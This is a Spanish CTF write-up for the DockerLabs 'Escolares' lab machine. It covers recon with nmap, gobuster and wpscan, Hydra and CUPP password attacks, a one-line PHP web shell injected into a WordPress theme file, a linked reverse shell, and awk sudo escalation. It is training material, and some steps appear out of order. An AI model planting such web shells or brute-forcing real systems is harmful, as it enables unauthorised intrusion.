beafn28
  • 👩‍💻¡Bienvenidos a mi HackBook!
  • WRITEUPS
    • DockerLabs
      • BuscaLove
      • Amor
      • Injection
      • BorazuwarahCTF
      • Trust
      • Picadilly
      • Pinguinazo
      • AguaDeMayo
      • BreakMySSH
      • NodeClimb
      • Move
      • Los 40 ladrones
      • Vulnvault
      • Pntopntobarra
      • Library
      • Escolares
      • ConsoleLog
      • Vacaciones
      • Obsession
      • FirstHacking
      • SecretJenkins
      • HedgeHog
      • AnonymousPingu
      • ChocolateLovers
      • Dockerlabs
      • Pressenter
      • Candy
      • JenkHack
      • ShowTime
      • Upload
      • Verdejo
      • WalkingCMS
      • WhereIsMyWebShell
      • Whoiam
      • Winterfell
      • -Pn
      • Psycho
      • Mirame
      • Backend
      • Paradise
      • Balurero
      • Allien
      • Vendetta
      • FindYourStyle
      • Stellarjwt
      • File
      • Redirection (Por completar)
      • Extraviado
      • Patriaquerida
      • Tproot
      • Internship
      • Walking Dead
      • Bicho (Por completar)
      • BaluFood
    • TryHackMe
      • Brooklyn Nine Nine
      • Blue
    • HackTheBox
      • Nibbles
      • Starting Point
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Explosion
        • Preignition
        • Mongod
        • Synced
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
        • Included
        • Markup
        • Base
      • BoardLight
      • Cap
      • TwoMillion
      • Lame
      • Legacy
      • Devel
      • Beep
      • Optimum
      • Arctic
      • Jerry
      • Sau
      • GoodGames
      • Challenges
        • Emdee five for life
        • MarketDump
      • Intro to Dante
      • Heist
      • OpenAdmin
      • Nest
      • Curling
    • Vulnhub
      • Wakanda
      • Election (Por terminar)
    • The Hacker Labs
      • Avengers
      • Can you hack me?
      • Fruits
      • Microchoft
      • TickTakRoot
      • Grillo
      • Mortadela
      • Zapas Guapas
      • Sal y Azúcar
      • Cyberpunk
      • Papafrita
      • PizzaHot
      • Decryptor
      • Academy
      • Cocido andaluz
      • Find Me
      • Quokka
      • Campana Feliz
      • Bocata de Calamares
      • Casa Paco
      • Torrijas
    • Vulnyx
      • Fuser
      • Blogguer
      • Lower
      • Exec
      • Diff3r3ntS3c
      • Hacking Station
      • Experience
      • Eternal
      • Agent
      • Infected
      • Admin
      • War
      • Hosting
    • OverTheWire
      • Natas
        • Nivel 0-5
        • Nivel 6-11
        • Nivel 12-17
        • Nivel 18-23
        • Nivel 24-29
        • Nivel 30-34
      • Leviathan
        • Nivel 0-7
      • Krypton
      • Bandit
        • Nivel 0-10
        • Nivel 11-20
        • Nivel 21-30
        • Nivel 31-34
    • Proving Ground Play
      • Monitoring
      • DriftingBlues6
  • APUNTES HACKING
    • Pentesting Basics
      • Web Enumeration
      • Public Exploits
      • Types of Shells
      • Privilege Escalation
      • Transfering Files
    • Network Enumeration with NMAP
      • Host Discovery
      • Host and Port Scanning
      • Saving the Results
      • Service Enumeration
      • Nmap Scripting Engine
      • Performance
      • Firewall and IDS/IPS Evasion
    • Footprinting
      • Domain Information
      • Cloud Resources
      • FTP
      • SMB
      • NFS
      • DNS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
      • Linux Remote Management Protocols
      • Windows Remote Management Protocols
    • Information Gathering - Web Edition
      • WHOIS
      • DNS
        • Digging DNS
      • Subdomains
        • Subdomain Bruteforcing
        • DNS Zone Transfers
        • Virtual Hosts
        • Certificate Transparency Logs
      • Fingerprinting
      • Crawling
        • robots.txt
        • Well-Known URIs
        • Creepy Crawlies
      • Search Engine Discovery
      • Web Archives
      • Automating Recon
    • Vulnerability Assessment
      • Vulnerability Assessment
      • Assessment Standards
      • Common Vulnerability Scoring System (CVSS)
      • Common Vulnerabilities and Exposures (CVE)
    • Nessus
      • Getting Started with Nessus
      • Nessus Scan
      • Advanced Settings
      • Working with Nessus Scan Output
      • Scanning Issues
    • OpenVAS
      • OpenVAS Scan
      • Exporting The Results
    • Reporting
    • File Transfers
      • Windows File Transfer Methods
      • Linux File Transfer Methods
      • Transferring Files with Code
      • Miscellaneous File Transfer Methods
      • Protected File Transfers
      • Catching Files over HTTP/S
      • Living off The Land
      • Detection
      • Evading Detection
    • Shells & Payloads
      • Anatomy of a Shell
      • Bind Shells
      • Reverse Shells
      • Payloads
        • Automating Payloads & Delivery with Metasploit
        • Crafting Payloads with MSFvenom
        • Infiltrating Windows
        • Infiltrating Unix/Linux
        • Spawning Interactive Shells
      • Introduction to Web Shells
        • Laudanum, One Webshell to Rule Them All
        • Antak Webshell
        • PHP Web Shells
      • Detection & Prevention
    • Metasploit
      • MSFConsole
      • Modules
      • Targets
      • Payloads
      • Encoders
      • Databases
      • Plugins
      • Sessions
      • Meterpreter
      • Writing and Importing Modules
      • Introduction to MSFVenom
      • Firewall and IDS/IPS Evasion
    • Password Attacks
      • John The Ripper
      • Network Services
      • Password Mutations
      • Password Reuse / Default Passwords
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
      • Pass the Hash (PtH)
  • WEB SECURITY
    • Path Traversal
    • SQL Injection
    • Control de Acceso
  • Mis CTFs
    • Pequeñas Mentirosas
    • CryptoLabyrinth
    • Elevator
    • Facultad
  • PREPARAR EJPTv2
    • Máquinas
    • Curso de Mario
      • Presentación + Preparación de Laboratorios
      • Conceptos Básicos de Hacking
      • Explotación de Vulnerabilidades y Ataques de Fuerza Bruta
      • Explotación vulnerabilidades Web
      • Enumeración y Explotación del Protócolo SMB, SAMBA, SNMP, IIS y RDP
      • Hacking Entornos CMS
      • Escalada de Privilegios + Post Explotación
      • Pivoting con Metasploit
  • Preparar OSCP
    • Información
    • Máquinas
      • Linux
        • Fácil
        • Medio
        • Difícil
      • Windows
        • Fácil
        • Medio
        • Difícil
Powered by GitBook
On this page
  • 🔍 RECONOCIMIENTO
  • 🔎 EXPLORACIÓN
  • 🚀 EXPLOTACIÓN
  • 🔐 PRIVILEGIOS

Was this helpful?

  1. WRITEUPS
  2. DockerLabs

Escolares

✍️ Autor: Luisillo_o🔍 Dificultad: Fácil 📅 Fecha de creación: 09/06/2024

PreviousLibraryNextConsoleLog

Last updated 8 months ago

Was this helpful?

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open -sT --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos, por lo que se procederá a indagar más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora exploramos el servicio HTTP. Se ingresó la dirección IP en el navegador, lo que llevó a que la página web sobre una universidad de ciberseguridad.

De primeras, no se nos muestra nada, por lo que revisamos el código fuente por si hay alguna información oculta relevante.

Se nos muestra un comentario que parece ser relevante ya que la información del personal académico está en el directorio /profesores.html por lo que accedemos a él.

Nos llama la atención de Luis ya que pone que es el admin de Wordpress.

Ahora, buscamos directorios con la herramienta Gobuster a través del comando:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://172.17.0.2

Hemos localizado la ruta que necesitábamos, ahora utilizaremos WPscan para identificar la versión específica de WordPress y enumerar los usuarios, con el fin de confirmar los hallazgos anteriores.

wpscan --url http://172.17.0.2/wordpress/ -e u

Hemos confirmado la existencia del usuario luisillo en el WordPress. Ahora, procederemos a utilizar Hydra para realizar un ataque de fuerza bruta contra este usuario

🚀 EXPLOTACIÓN

Con la información obtenida anteriormente, realizamos el comando:

hydra -l luisillo -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -t 5

que utiliza la herramienta Hydra para realizar un ataque de fuerza bruta contra el servicio SSH de una máquina con la IP 172.17.0.2. No tenemos suerte por lo que probaremos otra cosa.

Para obtener la contraseña del usuario, utilizaremos la herramienta CUPP (Common User Passwords Profiler), que no viene preinstalada en Kali Linux. CUPP está diseñada para generar listas de contraseñas personalizadas basadas en la información específica del usuario objetivo. Esto es útil porque muchos usuarios suelen crear contraseñas utilizando datos personales, como su nombre, fecha de nacimiento o el nombre de su mascota, en lugar de contraseñas genéricas.

Una vez que hemos instalado CUPP, ejecutamos el siguiente comando en la terminal para iniciarlo en modo interactivo:

cupp -i

Con la lista de contraseñas generada, estamos preparados para llevar a cabo el ataque de fuerza bruta y tratar de obtener credenciales válidas.

La contraseña del usuario luisillo es Luis1981. Probamos las credenciales en el formulario del Wordpress.

Nos deja entrar cuando quitamos el bloqueo de las cookies.

Accede al archivo index.php en la ruta wp-content/themes/twentytwentytwo/ de tu instalación de WordPress y modifica el archivo con el siguiente código PHP:

<?php echo "<pre>". shell_exec($_REQUEST['cmd']). "</pre>" ?>

Luego, abre tu navegador y accede a la siguiente URL para ejecutar comandos:

http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/index.php?cmd=whoami
http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/reverse.php

Después de ejecutar el comando codificado en la URL, la página puede quedarse cargando indefinidamente. Esto indica que la solicitud está en proceso, pero no necesariamente significa que ha fallado.

Nos ponemos en escucha por el puerto 443:

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root ya que somos www-data como se mostraba anteriormente.

Para facilitar la interacción con la shell, migraremos a una sesión de bash más funcional. Esto es necesario porque en la shell actual no podemos utilizar las teclas de flecha ni acceder al historial de comandos. Ejecutando el siguiente comando, iniciamos una nueva sesión de bash sin registrar la actividad en ningún archivo:

script /dev/null -c bash

Estamos ejecutando comandos como el usuario www-data, lo que significa que nuestros permisos son limitados. Sin embargo, podemos intentar explorar el directorio /home para ver si encontramos algo interesante. Al revisar el contenido de /home, además de los directorios de usuarios, encontramos un archivo llamado secret.txt. Este archivo contiene la contraseña de un usuario llamado Luisillo, lo que podría ser útil para obtener acceso adicional.

Nos conectamos al sistema como el usuario Luisillo. Ahora que tenemos acceso como un usuario normal, navegamos a su carpeta personal y listamos el contenido, pero no encontramos nada relevante. Sin embargo, al ejecutar sudo -l, descubrimos que podemos elevar privilegios utilizando el binario awk.

Visitamos la página de GFTOBins para buscar una forma de escalar privilegios usando el binario awk. En la sección correspondiente a awk bajo el contexto de sudo, encontramos el comando que nos permitirá abusar de este binario para obtener privilegios de root. Puedes revisar los detalles en el siguiente enlace:

Tras eso, ponemos:

whoami

y ya somos root.

Nota: si nos da error se debe añadir el dominio a /etc/hosts es decir, añadir 172.17.0.2 escolares.dl y reiniciar la página.

Al ejecutar el comando whoami, deberías ver el resultado en la página, que indicará el usuario bajo el cual se está ejecutando el servidor web que es www-data. Sabiendo que podemos ejecutar cualquier comando, vamos a realizar una reverse shell utilizando la página web por lo que subimos este archivo PHP

http://172.17.0.2/wordpress/wp-login.php
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
GFTOBins - awk (sudo)